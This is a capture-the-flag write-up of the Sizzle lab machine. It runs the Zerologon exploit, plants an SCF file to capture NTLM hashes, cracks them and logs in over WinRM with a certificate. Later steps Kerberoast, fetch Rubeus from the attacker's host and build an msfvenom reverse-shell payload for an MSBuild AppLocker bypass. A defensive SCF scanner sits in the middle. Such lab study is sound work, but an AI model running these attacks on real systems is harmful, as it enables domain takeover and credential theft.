This box falls instantly to Zerologon (CVE-2020-1472):
python3 cve-2020-1472-exploit.py SIZZLE 10.10.10.103
impacket-secretsdump -no-pass -just-dc htb/SIZZLE\$@10.10.10.103
impacket-psexec administrator@10.10.10.103 -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267
nmap -p- -v --min-rate 10000 -sV -A 10.10.10.103
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:47+00:00; -4s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:46+00:00; -1s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:46+00:00; -1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:47+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-07-02T11:09:46+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-02T20:26:23
| Not valid after: 2019-07-02T20:26:23
| MD5: acd1 5e32 da9d 89e2 cde5 7b46 ca12 1d5e
|_SHA-1: 06b2 0070 6600 2651 4c70 054f b1aa 9c15 cadd f233
|_ssl-date: 2022-07-02T11:09:46+00:00; -1s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open unknown
49677/tcp open msrpc Microsoft Windows RPC
49688/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 1s, median: -1s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-07-02T11:08:51
|_ start_date: 2022-07-02T11:03:17
sizzle.htb.local
nmap -n -sV --script "ldap* and not brute" 10.10.10.103
This gives the domain name HTB.LOCAL.
Anonymous login is allowed, but there is nothing inside.
Tested for DNS zone transfer: the vulnerability is not present.
Anonymous bind works, but it has no permission to query.
Ports 80 and 443 appear to serve the same site.
The certsrv directory requires a username and password.
The IIS short-file-name enumeration vulnerability exists.
No other findings.
Anonymous login works:
smbclient --no-pass -L //10.10.10.103
IPC$ can be connected to, but no operations are permitted. Department Shares is accessible:
smbclient '//10.10.10.103/Department Shares' -N
The users directory yields a batch of usernames that may be useful:
amanda
amanda_adm
bill
bob
chris
henry
joe
jose
lkys37en
morgan
mrb3n
Public
Verifying with kerbrute shows that only amanda is a domain user:
./kerbrute_linux_amd64 userenum -d HTB.LOCAL --dc 10.10.10.103 /home/wuerror/Downloads/temp/sizzle/user.txt
Further checking shows the users/Public directory is writable, so an SCF file named @wuerror.scf is uploaded:
[Shell]
Command=2
IconFile=\\10.10.14.12\wuerror.ico
[Taskbar]
Command=ToggleDesktop
Listen locally with Responder:
sudo responder -I
Crack the captured hash with John:
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt amanda-hash.txt
This gives the password Ashare1972.
Look at SMB as amanda:
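The SCF trick above works because a writable share lets anyone drop a file whose IconFile points at an attacker-controlled UNC path. As an added defender-side example (not part of this writeup), here is a scanner that walks a mounted share for .scf files whose IconFile is fetched from a host outside an allowlist; the allowlist host and the sample files are constructed assumptions.

```python
import configparser
import os
import tempfile
from pathlib import Path

# Hosts legitimately allowed to serve icons over SMB (assumption: a defender
# would fill this with their own file servers).
ALLOWED_ICON_HOSTS = {"fileserver.htb.local"}

def unc_host(path):
    """Return the lower-cased host of a UNC path like \\\\host\\share\\x, else None."""
    p = path.strip()
    if not p.startswith("\\\\"):
        return None
    host = p[2:].split("\\", 1)[0]
    return host.lower() or None

def scf_icon_target(path):
    """Parse an .scf file (INI syntax) and return its [Shell] IconFile value."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    with open(path, encoding="utf-8", errors="replace") as fh:
        cp.read_string(fh.read())
    return cp.get("Shell", "IconFile", fallback=None)

def find_suspicious_scf(root):
    """Walk a share and return (path, host) for .scf files whose icon is
    loaded from a UNC host that is not on the allowlist."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            full = os.path.join(dirpath, name)
            try:
                icon = scf_icon_target(full)
            except (configparser.Error, OSError):
                continue  # unparsable file: not an SCF we can judge
            host = unc_host(icon) if icon else None
            if host and host not in ALLOWED_ICON_HOSTS:
                hits.append((full, host))
    return hits

def demo():
    """Constructed share tree: one benign and one rogue .scf under Users/Public."""
    root = tempfile.mkdtemp()
    pub = Path(root, "Users", "Public")
    pub.mkdir(parents=True)
    (pub / "ok.scf").write_text("[Shell]\nCommand=2\nIconFile=\\\\fileserver.htb.local\\icons\\a.ico\n")
    (pub / "@rogue.scf").write_text("[Shell]\nCommand=2\nIconFile=\\\\10.10.14.12\\x.ico\n[Taskbar]\nCommand=ToggleDesktop\n")
    return find_suspicious_scf(root)
```

Run against a share mounted on the scanning host; a hit means the share should be made read-only for that principal and the file removed.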
smbmap -H 10.10.10.103 -u amanda -p Ashare1972 -R SYSVOL\HTB.LOCAL\Policies
No Groups.xml found.
Tried WinRM login: failed. No writable SMB share, and psexec fails.
Logging in to the web site succeeds.
Generate a certificate request locally with OpenSSL:
openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr
Press Enter through every prompt without filling anything in.
Then on the web page choose Request a certificate ----> Submit an advanced certificate request.
Download the certificate it issues (certnew.cer) locally, then log in with the WinRM script:
require 'winrm'   # gem install winrm
# Author: Alamot
# Certificate-based WinRM login over HTTPS (5986) using the client
# certificate issued by the CA and the key generated with openssl.
conn = WinRM::Connection.new(
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: 'certnew.cer',
  client_key: 'amanda.key',
  no_ssl_peer_verification: true
)

command = ""
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build the prompt from the remote session's own variables
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets || "exit\n"   # treat EOF on stdin as "exit"
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
Get the domain user list:
net user /domain
Administrator amanda DefaultAccount
Guest krbtgt mrlky
sizzler
impacket-GetUserSPNs HTB.LOCAL/amanda:Ashare1972 -outputfile hash.kerberoast -dc-ip 10.10.10.103
The mrlky user is kerberoastable, but the request timed out. Try uploading Rubeus.
The download is blocked, and running tasklist is not permitted either.
But downloading with PowerShell works:
Invoke-RestMethod -Uri http://10.10.14.12:8000/rb.exe -OutFile c:\temp\rb.exe
.\rb.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972
blocked by group policy
$executioncontext.sessionstate.languagemode
This shows the session is in constrained language mode.
AppLocker bypass: shellcode.xml. Generate shellcode, put it into the XML mentioned above, then change the extension to .csproj:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=5555 -f csharp -o meterpreter_445.cs -v shellcode
Trigger the reverse shell with MSBuild:
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe shell.csproj
But the bypass failed...